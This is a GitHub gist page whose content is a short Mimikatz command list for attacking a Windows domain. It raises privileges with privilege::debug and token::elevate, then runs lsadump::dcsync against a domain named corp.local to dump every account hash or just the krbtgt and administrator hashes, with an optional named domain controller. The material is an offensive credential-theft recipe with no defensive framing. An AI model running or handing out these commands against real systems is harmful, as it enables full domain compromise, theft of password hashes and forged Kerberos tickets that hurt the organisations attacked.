Created
November 20, 2025 19:59
-
-
Save justaguywhocodes/e2481b82dd0850bd7269940ca9ec06cb to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Elevate privileges | |
| privilege::debug | |
| token::elevate | |
| # Full domain dump (all hashes) | |
| lsadump::dcsync /domain:corp.local /all /csv | |
| # Specific high-value accounts only | |
| lsadump::dcsync /domain:corp.local /user:krbtgt | |
| lsadump::dcsync /domain:corp.local /user:administrator | |
| # With domain controller specified (optional but faster) | |
| lsadump::dcsync /domain:corp.local /dc:dc01.corp.local /user:krbtgt |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment